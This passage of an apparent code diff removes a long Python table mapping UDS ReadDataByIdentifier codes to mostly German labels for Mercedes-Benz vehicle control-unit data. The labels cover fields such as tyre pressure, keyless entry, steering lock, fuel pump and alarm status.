Signal Error" # or Lernwerte Lenkwinkel -UDS_RDBI.dataIdentifiers[0x0231] = "PM Status H0 Schalter" -UDS_RDBI.dataIdentifiers[0x0232] = "Fahrzeugausstattung " -UDS_RDBI.dataIdentifiers[0x0233] = "Globale Variantencodierung auslesen Baureihe" -UDS_RDBI.dataIdentifiers[0x023a] = "Eigendiagnose Eintraege global ED EEPROM Code" # or Eigendiagnose Eintraege global loeschen -UDS_RDBI.dataIdentifiers[0x0240] = "PlatformThresholds CurrentlyInUse" # or 0240 Audio Codec Supply Voltage Signal Error -UDS_RDBI.dataIdentifiers[0x0241] = "PlatformThresholds Programmed" # or Internal Power Supplies -UDS_RDBI.dataIdentifiers[0x0242] = "Axle Nominal Isochores" -UDS_RDBI.dataIdentifiers[0x0243] = "Filling Detection Compare Values" -UDS_RDBI.dataIdentifiers[0x0245] = "Read Message Memory" -UDS_RDBI.dataIdentifiers[0x0247] = "Read Activation Memory" -UDS_RDBI.dataIdentifiers[0x0249] = "PlatformThresholds MinimumReferencePressure" -UDS_RDBI.dataIdentifiers[0x024a] = "PlatformThresholds LogicalData" -UDS_RDBI.dataIdentifiers[0x0255] = "WAL failure Statistics" -UDS_RDBI.dataIdentifiers[0x0256] = "Axle/Side Location" -UDS_RDBI.dataIdentifiers[0x0258] = "Get WAL monitoring counters" -UDS_RDBI.dataIdentifiers[0x025a] = "Autolocation Overide Switch" -UDS_RDBI.dataIdentifiers[0x025b] = "WAL RSSI Monitor" -UDS_RDBI.dataIdentifiers[0x0260] = "Status EOL Funktionstest" -UDS_RDBI.dataIdentifiers[0x0261] = "RF Statistics Right Front" -UDS_RDBI.dataIdentifiers[0x0262] = "RF Statistics Right Rear" -UDS_RDBI.dataIdentifiers[0x0263] = "RF Statistics Left Rear" -UDS_RDBI.dataIdentifiers[0x0265] = "LastReceivedTelegram LF" -UDS_RDBI.dataIdentifiers[0x0266] = "LastReceivedTelegram RF" -UDS_RDBI.dataIdentifiers[0x0267] = "LastReceivedTelegram RR" -UDS_RDBI.dataIdentifiers[0x0268] = "LastReceivedTelegram LR" -UDS_RDBI.dataIdentifiers[0x0271] = "CoastMode Control" -UDS_RDBI.dataIdentifiers[0x0273] = "Last Reset Type Counters" -UDS_RDBI.dataIdentifiers[0x0283] = "Local Battery Voltage" -UDS_RDBI.dataIdentifiers[0x0287] = "Low Battery Data" -UDS_RDBI.dataIdentifiers[0x0290] = "Low Battery Data Left Front" -UDS_RDBI.dataIdentifiers[0x0291] = "Low Battery Data Right Front" -UDS_RDBI.dataIdentifiers[0x0292] = "Low Battery Data Right Rear" -UDS_RDBI.dataIdentifiers[0x0293] = "Low Battery Data Left Rear" -UDS_RDBI.dataIdentifiers[0x0298] = "SEL Statistical data" -UDS_RDBI.dataIdentifiers[0x029c] = "RF Gain Mode CurrentlyInUse" -UDS_RDBI.dataIdentifiers[0x029d] = "RF Gain Mode Programmed" -UDS_RDBI.dataIdentifiers[0x02a0] = "Pressure values for model BR221" -UDS_RDBI.dataIdentifiers[0x02a1] = "Pressure values for model BR216" -UDS_RDBI.dataIdentifiers[0x02a2] = "Pressure values for model BR212" -UDS_RDBI.dataIdentifiers[0x02a3] = "Pressure values for model BR197/BR164" -UDS_RDBI.dataIdentifiers[0x02a4] = "Pressure values for model BR166" -UDS_RDBI.dataIdentifiers[0x02a5] = "Pressure values for model BR172/BR251" -UDS_RDBI.dataIdentifiers[0x02a6] = "Pressure values for model BR218" -UDS_RDBI.dataIdentifiers[0x02a7] = "Pressure values for model BR207" -UDS_RDBI.dataIdentifiers[0x02a8] = "Pressure values for model BR204" -UDS_RDBI.dataIdentifiers[0x02af] = "Gelernte HFS/ARWT Normierparameter NV" -UDS_RDBI.dataIdentifiers[0x02b1] = "Variant Coding" -UDS_RDBI.dataIdentifiers[0x02b3] = "Read RF" -UDS_RDBI.dataIdentifiers[0x02d7] = "Warntongeber" -UDS_RDBI.dataIdentifiers[0x02dd] = "Diagnosedaten Service Diagnosedaten" -UDS_RDBI.dataIdentifiers[0x02e4] = "MB Teilenummer Teilenummer Ersatzteil" -UDS_RDBI.dataIdentifiers[0x0300] = "Flanken Erkennung Fahrertuer" -UDS_RDBI.dataIdentifiers[0x0301] = "SynchronizationLost Data" # or 08 Parameter Not Acknowledge Time Schreiben, SynchronizationLost Counter, DidA Rahmenwiederholungen DidA Rahmenwiederholungen, 08 Parameter Not Acknowledge Time Lesen -UDS_RDBI.dataIdentifiers[0x0302] = "SynchronizationLost Odo0 bis 7" # or 09 Parameter Diag Active Time Lesen, 09 Parameter Diag Active Time Schreiben, Reservebaureihen und Reservekarosserievarianten Baureihe BR -UDS_RDBI.dataIdentifiers[0x0303] = "Daten Antennenmodul" # or Daten Antennenmodul Read Frequenzvariante, Daten Antennenmodul Read Pmin, Daten Antennenmodul EEPROM Patch Level, Daten Antennenmodul Read KG Pmax, Daten Antennenmodul Frequenzvariante, Daten Antennenmodul Read KG Pmin -UDS_RDBI.dataIdentifiers[0x0304] = "HF Konfig" # or LifeCycle, HF Konfig Dida, HF Konfig Sendeleistung KG -UDS_RDBI.dataIdentifiers[0x0305] = "FBS mobil Tuergriff" -UDS_RDBI.dataIdentifiers[0x0306] = "ZV Konfiguration Write" # or ZV Konfiguration Read, Sensor Offset -UDS_RDBI.dataIdentifiers[0x0307] = "Position Sensor Offset" -UDS_RDBI.dataIdentifiers[0x0308] = "Status VIN Verriegelung" # or Predicted Fuel Pressure Offset -UDS_RDBI.dataIdentifiers[0x0309] = "Compile Time" -UDS_RDBI.dataIdentifiers[0x030a] = "ZGW Verbaute Steuergeraete Soll Engine" -UDS_RDBI.dataIdentifiers[0x030b] = "Number of cold start interruptted by voltage out of range" -UDS_RDBI.dataIdentifiers[0x030c] = "Number of rv close 100ms" -UDS_RDBI.dataIdentifiers[0x030d] = "verbaute Steuergeraete Soll Bus 4" -UDS_RDBI.dataIdentifiers[0x030e] = "verbaute Steuergeraete Soll Bus 5" -UDS_RDBI.dataIdentifiers[0x030f] = "verbaute Steuergeraete Soll Bus 6" -UDS_RDBI.dataIdentifiers[0x0310] = "verbaute Steuergeraete Soll BodyRaw ECU Vektor Soll" -UDS_RDBI.dataIdentifiers[0x0311] = "verbaute Steuergeraete Soll Chassis1 Raw ECU Vektor Soll" -UDS_RDBI.dataIdentifiers[0x0312] = "verbaute Steuergeraete Soll Chassis2 Raw ECU Vektor Soll" -UDS_RDBI.dataIdentifiers[0x0313] = "verbaute Steuergeraete Soll Diagnostic CGW" -UDS_RDBI.dataIdentifiers[0x0314] = "07 Fahrzeugspezifische Daten Lesen" -UDS_RDBI.dataIdentifiers[0x0315] = "External failure" -UDS_RDBI.dataIdentifiers[0x0316] = "Kontrollschalter Eigendiagnose" -UDS_RDBI.dataIdentifiers[0x0317] = "voltage kl30z st cold auto rv close" -UDS_RDBI.dataIdentifiers[0x0318] = "number of PN swith close due to current flow pass diodes" -UDS_RDBI.dataIdentifiers[0x0319] = "switch failure" -UDS_RDBI.dataIdentifiers[0x031a] = "ZGW Konfiguration D CAN" # or KL50 time out -UDS_RDBI.dataIdentifiers[0x031b] = "KL50 0 and WS 0 timeout or WS signal 2 5V 6V" -UDS_RDBI.dataIdentifiers[0x031c] = "other HW failure" -UDS_RDBI.dataIdentifiers[0x0320] = "reset all fault history memory" -UDS_RDBI.dataIdentifiers[0x0321] = "Informationen BINAER 1 Authentisch benutzt" -UDS_RDBI.dataIdentifiers[0x0322] = "EZS erweiterter Status KeylessGo" -UDS_RDBI.dataIdentifiers[0x0324] = "ZV Letzte Bedienungen" -UDS_RDBI.dataIdentifiers[0x0325] = "ZV Letzte Bedienungen Ringpuffer" -UDS_RDBI.dataIdentifiers[0x0326] = "ZV Letzte Schluessel Aktion" -UDS_RDBI.dataIdentifiers[0x0327] = "PRE Lock Ereignisspeicher" -UDS_RDBI.dataIdentifiers[0x0328] = "Status Thatcham SE Fangbereich Rechenschritte Auth" -UDS_RDBI.dataIdentifiers[0x0329] = "Letzter FC DSM Letzter Funktionscode vom DSM" -UDS_RDBI.dataIdentifiers[0x032a] = "verbaute Steuergeraete Ist Bus" -UDS_RDBI.dataIdentifiers[0x032b] = "verbaute Steuergeraete Ist Bus" -UDS_RDBI.dataIdentifiers[0x032c] = "verbaute Steuergeraete Ist Bus" -UDS_RDBI.dataIdentifiers[0x032d] = "verbaute Steuergeraete Ist Bus 4" -UDS_RDBI.dataIdentifiers[0x032e] = "verbaute Steuergeraete Ist Bus 5" -UDS_RDBI.dataIdentifiers[0x032f] = "verbaute Steuergeraete Ist Bus 6" -UDS_RDBI.dataIdentifiers[0x0330] = "Letzter FC MSG Letzter Funktionscode vom MSG" -UDS_RDBI.dataIdentifiers[0x0331] = "Letzter FC Getriebe Letzter Funktionscode vom Getriebe" -UDS_RDBI.dataIdentifiers[0x0332] = "Letzter FC Hybrid SG Letzter Funktionscode vom Hybrid SG" -UDS_RDBI.dataIdentifiers[0x0333] = "Letzter FC ELV Letzter Funktionscode von der ELV" -UDS_RDBI.dataIdentifiers[0x0334] = "Letzter FC Schluessel Letzter Funktionscode vom Schluessel" -UDS_RDBI.dataIdentifiers[0x0335] = "Status Konfigurationsbyte EZS verriegeln Status Konfigurationsbyte" -UDS_RDBI.dataIdentifiers[0x0336] = "Letzter FC DSM" -UDS_RDBI.dataIdentifiers[0x0337] = "Status Thatcham SE Fangbereich" -UDS_RDBI.dataIdentifiers[0x0338] = "Konfiguration Schluessel im EZS" -UDS_RDBI.dataIdentifiers[0x033a] = "Eigendiagnose Eintraege global" -UDS_RDBI.dataIdentifiers[0x033b] = "Eigendiagnose Eintraege identifiziert Anzahl erkannter Fehler" -UDS_RDBI.dataIdentifiers[0x033c] = "Eigendiagnose Zaehler global" -UDS_RDBI.dataIdentifiers[0x033d] = "Eigendiagnose Zaehler indiziert" -UDS_RDBI.dataIdentifiers[0x033e] = "Eigendiagnose FSP Eintrag AS AGC LOCK in FSP uebernehmen" -UDS_RDBI.dataIdentifiers[0x0340] = "Eindrahtschnittstelle Info Funkempfaenger vorhanden" -UDS_RDBI.dataIdentifiers[0x0341] = "Funkempfaenger Laendervariante Laendervariante" -UDS_RDBI.dataIdentifiers[0x0342] = "HF Empfangsdaten AUTH ZB" -UDS_RDBI.dataIdentifiers[0x0350] = "Konfiguration ELV VCD" -UDS_RDBI.dataIdentifiers[0x0351] = "ELV Verriegelungsablaufdaten" -UDS_RDBI.dataIdentifiers[0x0352] = "Signale zur Klemmengenerierung" -UDS_RDBI.dataIdentifiers[0x0360] = "Konfiguration Polling" -UDS_RDBI.dataIdentifiers[0x0361] = "Konfiguration FBS4 Write" -UDS_RDBI.dataIdentifiers[0x0380] = "SST Konfiguration" -UDS_RDBI.dataIdentifiers[0x0382] = "BTS Konfiguration VCD" -UDS_RDBI.dataIdentifiers[0x0385] = "Konfiguration IGN ON" -UDS_RDBI.dataIdentifiers[0x0386] = "Konfiguration Klemmen VAN" -UDS_RDBI.dataIdentifiers[0x0390] = "RTC Datum Uhrzeit" -UDS_RDBI.dataIdentifiers[0x0391] = "RTC Konfiguration" -UDS_RDBI.dataIdentifiers[0x0392] = "RTC Tagesumschlagzaehler" -UDS_RDBI.dataIdentifiers[0x03a0] = "Konfiguration fuer Produktion VC" -UDS_RDBI.dataIdentifiers[0x03a1] = "TAG Konfiguration" -UDS_RDBI.dataIdentifiers[0x03a2] = "TAG Position Tuergriff" -UDS_RDBI.dataIdentifiers[0x03ff] = "Lieferumfangsnummer" -UDS_RDBI.dataIdentifiers[0x0400] = "0400 Signal engine rpm last correct value" -UDS_RDBI.dataIdentifiers[0x0401] = "KG231 Konfiguration" # or Max operating voltage -UDS_RDBI.dataIdentifiers[0x0402] = "single RV mos 2ms ocp" -UDS_RDBI.dataIdentifiers[0x0403] = "KeylessGo Kodierung" -UDS_RDBI.dataIdentifiers[0x0404] = "single RV mos 10ms ocp" -UDS_RDBI.dataIdentifiers[0x0405] = "Schalterspeicher Heckklappentaster" -UDS_RDBI.dataIdentifiers[0x0406] = "single RV MOS continual min start current" -UDS_RDBI.dataIdentifiers[0x0407] = "single bypass MOS switch min start current" -UDS_RDBI.dataIdentifiers[0x0408] = "Cold start KL50 ST RV switch close delay" -UDS_RDBI.dataIdentifiers[0x0409] = "CfgVAN DTSTO Read" -UDS_RDBI.dataIdentifiers[0x040a] = "warm start KL50 ST RV switch close delay" -UDS_RDBI.dataIdentifiers[0x040b] = "warm start to pre charging KL50 ST by pass switch open delay" -UDS_RDBI.dataIdentifiers[0x040c] = "pre charging to charging WS PN switch close delay" -UDS_RDBI.dataIdentifiers[0x040d] = "charging to pre auto warm start WS PN switch open delay" -UDS_RDBI.dataIdentifiers[0x040e] = "ST bypass close delay after RV close max" -UDS_RDBI.dataIdentifiers[0x040f] = "ST bypass close delay after RV close min" -UDS_RDBI.dataIdentifiers[0x0410] = "Kommunikation ELV" -UDS_RDBI.dataIdentifiers[0x0411] = "Kommunikation MSG Letzter Funktionscode vom MSG" -UDS_RDBI.dataIdentifiers[0x0412] = "Kommunikation Getriebe Letzter Funktionscode vom Getriebe" -UDS_RDBI.dataIdentifiers[0x0413] = "Kommunikation DSM Letzter Funktionscode vom DSM" -UDS_RDBI.dataIdentifiers[0x0414] = "Kommunikation Hybrid SG Letzter Funktionscode vom Hybrid SG" -UDS_RDBI.dataIdentifiers[0x0415] = "Kommunikation Schluessel Letzter Funktionscode vom Schluessel" -UDS_RDBI.dataIdentifiers[0x0416] = "rv over heat threshold" -UDS_RDBI.dataIdentifiers[0x0417] = "starter open kl30z st threshold" -UDS_RDBI.dataIdentifiers[0x0420] = "0420 Signal vehicle speed last correct value" -UDS_RDBI.dataIdentifiers[0x0421] = "Informationen EZS Aktiviert" -UDS_RDBI.dataIdentifiers[0x0422] = "EZS erweiterter Status Authentikations Anforderungsart" -UDS_RDBI.dataIdentifiers[0x0425] = "Letzte ZV Bedienungen" -UDS_RDBI.dataIdentifiers[0x0430] = "0430 Signal ignition limit violation" -UDS_RDBI.dataIdentifiers[0x0440] = "0440 Signal drive program last correct value" -UDS_RDBI.dataIdentifiers[0x0470] = "ELV zyklische Pruefung" -UDS_RDBI.dataIdentifiers[0x0471] = "ELV Kommunikationsparameter" -UDS_RDBI.dataIdentifiers[0x0472] = "ELV Verriegelung" -UDS_RDBI.dataIdentifiers[0x0480] = "Motorweiterlaufschaltung" -UDS_RDBI.dataIdentifiers[0x0481] = "Remote Start Engine" -UDS_RDBI.dataIdentifiers[0x0490] = "ZV Nachlaufzeit Vorraste" -UDS_RDBI.dataIdentifiers[0x04a0] = "EZS Variantenkodierung Schluessel" -UDS_RDBI.dataIdentifiers[0x04a1] = "KM Stand Speicher CRC" -UDS_RDBI.dataIdentifiers[0x04d3] = "Schwellen taktile Leisten" -UDS_RDBI.dataIdentifiers[0x04f3] = "Variante" -UDS_RDBI.dataIdentifiers[0x04f4] = "Variantenstatus" -UDS_RDBI.dataIdentifiers[0x0501] = "Version Applikationsmodell NV" -UDS_RDBI.dataIdentifiers[0x0502] = "Version FuMo Interface NV" -UDS_RDBI.dataIdentifiers[0x0503] = "Eingangssignale" -UDS_RDBI.dataIdentifiers[0x0504] = "Spiegelabklappung" -UDS_RDBI.dataIdentifiers[0x0505] = "FZV Zaehler" -UDS_RDBI.dataIdentifiers[0x0506] = "ZV Status aktuell" -UDS_RDBI.dataIdentifiers[0x0507] = "SwcDidaC TransportDp3Offset" -UDS_RDBI.dataIdentifiers[0x0509] = "FBS mobil Tuergriff Daten" -UDS_RDBI.dataIdentifiers[0x050a] = "SwcDidaC TransportCOM ActiveState Read" -UDS_RDBI.dataIdentifiers[0x050d] = "Read Stored EVC Configuration" -UDS_RDBI.dataIdentifiers[0x0510] = "Verzoegerungzeit Verriegelung ELV Verzoegerungzeit Verriegelung ELV" -UDS_RDBI.dataIdentifiers[0x0511] = "Keyless Data Set KDS" -UDS_RDBI.dataIdentifiers[0x0513] = "FBS mobil Tuergriff Konfiguration" -UDS_RDBI.dataIdentifiers[0x0514] = "UWB HF Konfiguration" -UDS_RDBI.dataIdentifiers[0x0520] = "LF Parameter Exterior Scan LI Write" -UDS_RDBI.dataIdentifiers[0x0521] = "LF Parameter Exterior Scan RE Read" -UDS_RDBI.dataIdentifiers[0x0522] = "LF Parameter Exterior Scan REAR Write" -UDS_RDBI.dataIdentifiers[0x0523] = "LF Parameter INTERIOR Scan 1 Read" -UDS_RDBI.dataIdentifiers[0x0524] = "LF Parameter INTERIOR Scan 2 Write" -UDS_RDBI.dataIdentifiers[0x0525] = "LF Parameter Reserve 1" -UDS_RDBI.dataIdentifiers[0x0526] = "LF Parameter Reserve 2" -UDS_RDBI.dataIdentifiers[0x0527] = "LF Parameter Reserve 3" -UDS_RDBI.dataIdentifiers[0x0528] = "LF Parameter Reserve 1" -UDS_RDBI.dataIdentifiers[0x0529] = "LF Parameter Reserve 5" -UDS_RDBI.dataIdentifiers[0x0530] = "0530 Audio Codec Status AD not powered up" -UDS_RDBI.dataIdentifiers[0x0531] = "Feldauswertung 1 FieldEvalHistFound 2" -UDS_RDBI.dataIdentifiers[0x0532] = "Feldauswertung 1 FieldEvalHistFound 3" -UDS_RDBI.dataIdentifiers[0x0533] = "DidAc DP1 Part4 1" -UDS_RDBI.dataIdentifiers[0x0534] = "Feldauswertung 1 FieldEvalHistFound 5" -UDS_RDBI.dataIdentifiers[0x0535] = "Feldauswertung 1 FieldEvalHistFound 6" -UDS_RDBI.dataIdentifiers[0x0536] = "Feldauswertung 1 FieldEvalHistFound 7" -UDS_RDBI.dataIdentifiers[0x0537] = "Feldauswertung 1 FieldEvalHistFound 8" -UDS_RDBI.dataIdentifiers[0x0538] = "Feldauswertung 1 FieldEvalHistFound 9" -UDS_RDBI.dataIdentifiers[0x0539] = "Feldauswertung 1 FieldEvalHistFound 10" -UDS_RDBI.dataIdentifiers[0x0540] = "Feldauswertung 2" -UDS_RDBI.dataIdentifiers[0x0541] = "Feldauswertung 2 2" -UDS_RDBI.dataIdentifiers[0x0542] = "Feldauswertung 2 3" -UDS_RDBI.dataIdentifiers[0x0543] = "Feldauswertung 2 4" -UDS_RDBI.dataIdentifiers[0x0544] = "Feldauswertung 2 5" -UDS_RDBI.dataIdentifiers[0x0545] = "Feldauswertung 2 6" -UDS_RDBI.dataIdentifiers[0x0546] = "Feldauswertung 2 7" -UDS_RDBI.dataIdentifiers[0x0547] = "Feldauswertung 2 8" -UDS_RDBI.dataIdentifiers[0x0548] = "Feldauswertung 2 9" -UDS_RDBI.dataIdentifiers[0x0549] = "Feldauswertung 2 10" -UDS_RDBI.dataIdentifiers[0x0550] = "Antennenmodul Daten" -UDS_RDBI.dataIdentifiers[0x0551] = "Softwarestand" -UDS_RDBI.dataIdentifiers[0x0560] = "Wiederholungen ueber Funk" -UDS_RDBI.dataIdentifiers[0x0561] = "Klassifizierung fuer KG Wiederholungen" -UDS_RDBI.dataIdentifiers[0x0562] = "Erstellung von Tuergriffprofilen" -UDS_RDBI.dataIdentifiers[0x0563] = "Anzahl Initialisierungen Funkempfaengers" -UDS_RDBI.dataIdentifiers[0x0564] = "Spielschutz" -UDS_RDBI.dataIdentifiers[0x0565] = "HFA Ausloesungen ohne ID Geber" -UDS_RDBI.dataIdentifiers[0x0566] = "Kombimeldung Schluesselbatterie wechseln" -UDS_RDBI.dataIdentifiers[0x0567] = "Resetcounter" # or Program Flow Monitoring -UDS_RDBI.dataIdentifiers[0x0568] = "Daten des ID Gebers" -UDS_RDBI.dataIdentifiers[0x0569] = "SCN CfgByteList 01" -UDS_RDBI.dataIdentifiers[0x056f] = "SCN Parameter 2" -UDS_RDBI.dataIdentifiers[0x0570] = "LIN Modus Umschaltung" -UDS_RDBI.dataIdentifiers[0x0571] = "SCN Parameter 3" -UDS_RDBI.dataIdentifiers[0x0572] = "SCN Parameter 4" -UDS_RDBI.dataIdentifiers[0x0580] = "Datenblock EDS2 Bluetooth" -UDS_RDBI.dataIdentifiers[0x05f0] = "EOL VU2 WAKE STATI" -UDS_RDBI.dataIdentifiers[0x05f1] = "EOL VU2 Ausgabe ADC Werte" -UDS_RDBI.dataIdentifiers[0x0600] = "EZS Variantenkodierung Schluessel Dida" -UDS_RDBI.dataIdentifiers[0x0601] = "Ringpuffer Kommunikation KeylessGo" -UDS_RDBI.dataIdentifiers[0x0602] = "Ringpuffer Kommunikation ELV" -UDS_RDBI.dataIdentifiers[0x0603] = "Ringpuffer Kommunikation WMI" -UDS_RDBI.dataIdentifiers[0x0605] = "ECU Konfiguration II ELV" -UDS_RDBI.dataIdentifiers[0x0609] = "SwcDidaC TesterPresentHistory" -UDS_RDBI.dataIdentifiers[0x0650] = "BWM V2 Konfiguration VCD" -UDS_RDBI.dataIdentifiers[0x0651] = "BWM V2 Ereignisse Teil 1 Read Ereignisspeicher Teil" -UDS_RDBI.dataIdentifiers[0x0652] = "BWM V2 Ereignisse Teil 2 Read Ereignisspeicher Teil" -UDS_RDBI.dataIdentifiers[0x0653] = "BWM V2 Ereignisse Teil 3 Read Ereignisspeicher Teil" -UDS_RDBI.dataIdentifiers[0x0654] = "BWM V2 Ereignisse Teil 4 Read Ereignisspeicher Teil 4" -UDS_RDBI.dataIdentifiers[0x0655] = "BWM V2 Ueberwachungsphase" -UDS_RDBI.dataIdentifiers[0x0656] = "BWM V2 Fehlerdatenspeicher" -UDS_RDBI.dataIdentifiers[0x0657] = "BWM V2 Zaehler" -UDS_RDBI.dataIdentifiers[0x0700] = "RSE Konfiguration" -UDS_RDBI.dataIdentifiers[0x0701] = "Voltage Information Read" -UDS_RDBI.dataIdentifiers[0x0702] = "EKP Lauf" -UDS_RDBI.dataIdentifiers[0x0703] = "Sensor Information Read" -UDS_RDBI.dataIdentifiers[0x0704] = "SBC" -UDS_RDBI.dataIdentifiers[0x0706] = "Temperature Counter" -UDS_RDBI.dataIdentifiers[0x0707] = "Batteriespannung Read Response Parameters Batteriespannung" -UDS_RDBI.dataIdentifiers[0x0708] = "Zuendschluesselposition Read Response Parameters Zuendschluesselposition" -UDS_RDBI.dataIdentifiers[0x0709] = "Klemme 15 HW Read Response Parameters Klemme 15" -UDS_RDBI.dataIdentifiers[0x0710] = "FuelLowPress Sys Rq" -UDS_RDBI.dataIdentifiers[0x0711] = "EKP RUN Status Read Response Parameters EKP RUN" -UDS_RDBI.dataIdentifiers[0x0712] = "OFC Stat PT" -UDS_RDBI.dataIdentifiers[0x0713] = "Hebelgeber Widerstand primaer sekundaer" -UDS_RDBI.dataIdentifiers[0x0714] = "Kraftstofffuellstand Reserve" -UDS_RDBI.dataIdentifiers[0x0715] = "Kraftstoffmenge ungedaempft gesamt primaer sekundaer" -UDS_RDBI.dataIdentifiers[0x0716] = "Kraftstoffmenge gedaempft gesamt primaer sekundaer" -UDS_RDBI.dataIdentifiers[0x0717] = "Krafstoffmenge komplett gedaempft Read Krafstoffmenge komplett gedaempft" -UDS_RDBI.dataIdentifiers[0x0718] = "FuelLevel Stuck Status Read Response Parameters FuelLevel Stuck Status Secondary" -UDS_RDBI.dataIdentifiers[0x0719] = "Kraftstoffdruck Read Kraftstoffdruck" -UDS_RDBI.dataIdentifiers[0x0720] = "Kraftstoffdruck berechnet" -UDS_RDBI.dataIdentifiers[0x0721] = "Kraftstoffdruckvorgabe" -UDS_RDBI.dataIdentifiers[0x0722] = "Volumenstrom Vorgabe" -UDS_RDBI.dataIdentifiers[0x0723] = "Volumenstrom Kraftstoffpumpe berechnet" -UDS_RDBI.dataIdentifiers[0x0724] = "Volumenstrom Saugstrahlpumpe berechnet" -UDS_RDBI.dataIdentifiers[0x0725] = "Kraftstoffpumpendrehzahl Read Response Parameters Kraftstoffpumpendrehzahl" -UDS_RDBI.dataIdentifiers[0x0726] = "Kraftstoffpumpenspannung Read Response Parameters Kraftstoffpumpenspannung" -UDS_RDBI.dataIdentifiers[0x0727] = "Kraftstoffpumpenstrom effektiv" -UDS_RDBI.dataIdentifiers[0x0728] = "Kraftstoffpumpenstrom PhaseMax" -UDS_RDBI.dataIdentifiers[0x0729] = "Kraftstoffpumpendutycycle Read Response Parameters Kraftstoffpumpendutycycle" -UDS_RDBI.dataIdentifiers[0x0730] = "Kraftstoffethanolgehalt" -UDS_RDBI.dataIdentifiers[0x0731] = "Kraftstofftemperatur vom Drucksensor digital Read Kraftstofftemperatur vom Drucksensor digital" -UDS_RDBI.dataIdentifiers[0x0732] = "Steuergeraetetemperatur" -UDS_RDBI.dataIdentifiers[0x0733] = "SSP Failure Counter" -UDS_RDBI.dataIdentifiers[0x0734] = "Volume Lifetime Read Response Parameters Fuel Volume Lifetime" -UDS_RDBI.dataIdentifiers[0x0735] = "StDiagVolumeLastStuckConfirmedPrimary" -UDS_RDBI.dataIdentifiers[0x0736] = "StDiagVolumeLastStuckConfirmedSecondary" -UDS_RDBI.dataIdentifiers[0x0737] = "Tank Level Max and Active characteristic Read Response Parameters Tank Level Max" -UDS_RDBI.dataIdentifiers[0x0738] = "CAN FuelPress In" -UDS_RDBI.dataIdentifiers[0x0739] = "FD PredFuelPressAdaptedSignal" -UDS_RDBI.dataIdentifiers[0x0750] = "SPA Parameter" -UDS_RDBI.dataIdentifiers[0x0770] = "MCC Konfiguration" -UDS_RDBI.dataIdentifiers[0x0780] = "SCAS Konfiguration" -UDS_RDBI.dataIdentifiers[0x0781] = "Wake up puls configuration" -UDS_RDBI.dataIdentifiers[0x0782] = "Autonegotiation configuration" -UDS_RDBI.dataIdentifiers[0x0800] = "Actual E Stand" # or Secure Odometer Zustaende, Release Version TCU Core PRES E Stand ASCII type 20Byte, Release Version TCU Core -UDS_RDBI.dataIdentifiers[0x0801] = "Secure Odometer" -UDS_RDBI.dataIdentifiers[0x0802] = "Secure Odometer Kilometerstand" -UDS_RDBI.dataIdentifiers[0x0900] = "VTA HW Eingaenge" -UDS_RDBI.dataIdentifiers[0x0901] = "VTA Schalterzustand" -UDS_RDBI.dataIdentifiers[0x0902] = "VTA Schalterspeicher" -UDS_RDBI.dataIdentifiers[0x0903] = "VTA Schaltermodell" -UDS_RDBI.dataIdentifiers[0x0904] = "VTA Type Parameter" -UDS_RDBI.dataIdentifiers[0x0905] = "VTA Alarmhistorie" -UDS_RDBI.dataIdentifiers[0x0906] = "VTA Ueberwachungszustand" -UDS_RDBI.dataIdentifiers[0x0907] = "VTA Zaehlerstand Alarmrecycling" -UDS_RDBI.dataIdentifiers[0x0908] = "VTA Alarmtzustand" -UDS_RDBI.dataIdentifiers[0x0909] = "VTA Zustandsgroessen" -UDS_RDBI.dataIdentifiers[0x090a] = "VTA Country Parameter" -UDS_RDBI.dataIdentifiers[0x090b] = "VTA Schalterfreigabe" -UDS_RDBI.dataIdentifiers[0x090c] = "VTA Vehicle Type" -UDS_RDBI.dataIdentifiers[0x0a20] = "High Resolution DisCharge" -UDS_RDBI.dataIdentifiers[0x0a21] = "High Resolution Charge" -UDS_RDBI.dataIdentifiers[0x0e63] = "Fensterhochlaufbewertung" -UDS_RDBI.dataIdentifiers[0x0e70] = "Fensterreversierer Trace" -UDS_RDBI.dataIdentifiers[0x0e71] = "Fensterreversierer Trace" -UDS_RDBI.dataIdentifiers[0x0e72] = "Fensterreversierer Trace" -UDS_RDBI.dataIdentifiers[0x0e73] = "Fensterreversierer Trace 4" -UDS_RDBI.dataIdentifiers[0x0e74] = "Fensterreversierer Trace 5" -UDS_RDBI.dataIdentifiers[0x0e75] = "Fensterreversierer Trace 6" -UDS_RDBI.dataIdentifiers[0x0e76] = "Fensterreversierer Trace 7" -UDS_RDBI.dataIdentifiers[0x0e77] = "Fensterreversierer Trace 8" -UDS_RDBI.dataIdentifiers[0x1002] = "Batteriesensor" # or Erase all Production data, Learned drive positions -UDS_RDBI.dataIdentifiers[0x1003] = "Spannungs und Stromwerte" # or Geschwindigkeitsprofil Oeffnen -UDS_RDBI.dataIdentifiers[0x1004] = "CVN Berechnung" # or CVN Berechnung fertig, Stopp Start, PRND Movement Counter / P in emergency counter -UDS_RDBI.dataIdentifiers[0x1005] = "Restladestrombewertung" # or FIN Neuschreiben ist verriegelt, Regelparameter Oeffnen P-Anteil, Betriebszeit -UDS_RDBI.dataIdentifiers[0x1006] = "Module limits and position factors" # or Vernetzungsvariante, VIN Schreiben verriegelt -UDS_RDBI.dataIdentifiers[0x1007] = "Regelparameter Oeffnen I-Anteil" # or Kommunikationsvariante, 12V Systemabbild -UDS_RDBI.dataIdentifiers[0x1008] = "12V Li Systemabbild" # or Regelparameter Schliessen P-Anteil -UDS_RDBI.dataIdentifiers[0x1009] = "Regelparameter Schliessen I-Anteil" -UDS_RDBI.dataIdentifiers[0x100a] = "Darkzones" # or Model Version -UDS_RDBI.dataIdentifiers[0x100b] = "Blockiertoleranzen" -UDS_RDBI.dataIdentifiers[0x100c] = "Normierparameter VC" -UDS_RDBI.dataIdentifiers[0x100d] = "Allgemeine Funktionsparameter VC" -UDS_RDBI.dataIdentifiers[0x100e] = "Seriennummer MFT Test" -UDS_RDBI.dataIdentifiers[0x100f] = "Kontrollschalter 1 VC" -UDS_RDBI.dataIdentifiers[0x1010] = "Regelparameter Ausgangsumrechnung" -UDS_RDBI.dataIdentifiers[0x1011] = "Allgemeine Zustandsinformationen" -UDS_RDBI.dataIdentifiers[0x1012] = "AMS Sensor Diagnose Data" -UDS_RDBI.dataIdentifiers[0x1013] = "Kontrollschalter 4 VC" -UDS_RDBI.dataIdentifiers[0x1014] = "Stillstandserkennung" -UDS_RDBI.dataIdentifiers[0x1020] = "CALID OBCH" -UDS_RDBI.dataIdentifiers[0x1021] = "CALID HVAC" -UDS_RDBI.dataIdentifiers[0x1022] = "CALID DCDC48" -UDS_RDBI.dataIdentifiers[0x1023] = "CALID LISB48" 